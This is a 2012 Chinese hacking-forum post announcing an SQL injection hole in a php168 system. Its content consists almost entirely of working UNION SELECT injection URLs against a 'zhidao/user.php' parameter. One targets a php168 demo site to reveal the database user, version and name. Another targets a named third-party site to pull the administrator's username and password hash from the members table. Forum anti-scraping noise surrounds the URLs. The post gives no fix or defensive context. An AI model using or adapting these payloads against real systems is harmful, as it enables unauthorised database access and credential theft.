找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2965|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--2 Y- Q+ T4 ]2 c. @# r" x
                                                         
; Y! C8 K2 D3 o                                       
- `# C7 L9 ^0 z5 n  V# f& ~8 a
# t, Q9 m- }9 V6 r* s' n/ R
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--1 B4 N7 L  L. `+ {% j; r6 ]
                                                     
  _# p( C3 O0 V% r  R, K  D2 Y                                                                   ) Y( R) A2 @* V) b$ A
                                                        
( S. L% p6 r8 B- ^6 `http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--; \5 w. W; _5 g, h( s; `

: J% Y6 I% m8 I) x8 D% q- G0 _; Z
9 q, ~' |$ C1 y! x- j6 \) U; \" N; ^* _- y/ V1 N" B  W4 i- i* j
                                                            8 s0 x1 I0 N% C. f+ ^1 L# Q9 [
6 m9 S9 F) S. G; |" S7 {8 d
http://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--8 V  V8 n" ], A1 g
, F2 D! m; m$ b2 a# q

, w+ {/ g9 K0 n( V
9 H9 X$ h* _; q! F: H                                                                    
1 V  r/ _% q4 x# E' M

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表